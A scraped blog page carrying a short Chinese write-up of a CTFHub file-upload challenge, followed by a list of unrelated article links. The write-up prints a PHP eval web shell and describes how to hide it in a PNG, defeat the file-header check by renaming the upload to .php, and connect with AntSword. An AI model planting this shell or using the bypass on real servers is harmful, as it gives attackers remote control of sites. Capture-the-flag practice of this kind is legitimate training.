当前位置: 首页 > news >正文

CTFHUB-文件上传-文件头检查

news 2025/7/8 16:32:06

开启题目

1.php内容:
<?php @eval($_POST[cmd]);?>

截屏截一个很小很小的图片,保存为 png 格式,把 1.png 和 1.php 放在同一文件夹,在此目录打开 cmd, 使用以下命令把 1.png 和 1.php 合成为图片马

copy 1.png /b + 1.php /a shell.png

上传图片马 shell.png,抓包,修改后缀为 php

然后放包,上传成功

蚁剑连接

在“/var/www/html/flag_213312434.php”找到了 flag

http://www.lryc.cn/news/412431.html

相关文章:

  • c语言数组与指针,字符串与指针,指向函数的指针,malloca动态内存分配
  • 代码随想录算法训练营day30 | 452. 用最少数量的箭引爆气球 、435. 无重叠区间、763.划分字母区间
  • 如何手动修复DLL丢失?2种手动修复dll文件方法
  • Node.js(2)——压缩前端html
  • 堆的实现-向上调整算法-向下调整算法-堆排序-TopK问题 C语言
  • 【C++BFS】1466. 重新规划路线
  • 服务器并发模型
  • Chapter 23 数据可视化——地图
  • Linux笔记 --- 组合数据类型
  • DaoCloud-Dockfile文件NGINX文件
  • 耳机行业中MIC ENC
  • python-自动化办公-Excel-Openpyxl
  • 图形编辑器基于Paper.js教程10:导入导出svg,导入导出json数据
  • [STM32][Bootloader][教程]STM32 HAL库 Bootloader开发和测试教程
  • 如何手写一个SpringBoot框架
  • vite解决前端跨域步骤
  • 同步交互与异步交互:深入解析与选择
  • Day1
  • Introduction to Data Analysis with PySpark
  • 基于双PI控制器结构的六步逆变器供电无刷直流电机调速simulink仿真
  • 双向链表的基本操作
  • modbus tcp和modbusRTU的区别是什么?
  • web小游戏开发:拼图(四)对调和移动拼图玩法的实现
  • 前端:Vue学习 - 智慧商城项目
  • KVM调整虚拟机与CPU铆钉(绑定)关系
  • 华火电焰灶:烹饪新宠,温暖与美味的完美融合
  • 理想发周榜,不是新能源市场的原罪
  • AHK是让任何软件都支持 Shift + 鼠标滚轮 实现界面水平滚动
  • 如何在C语言中实现求解超级丑数
  • secExample靶场之java反序列化漏洞复现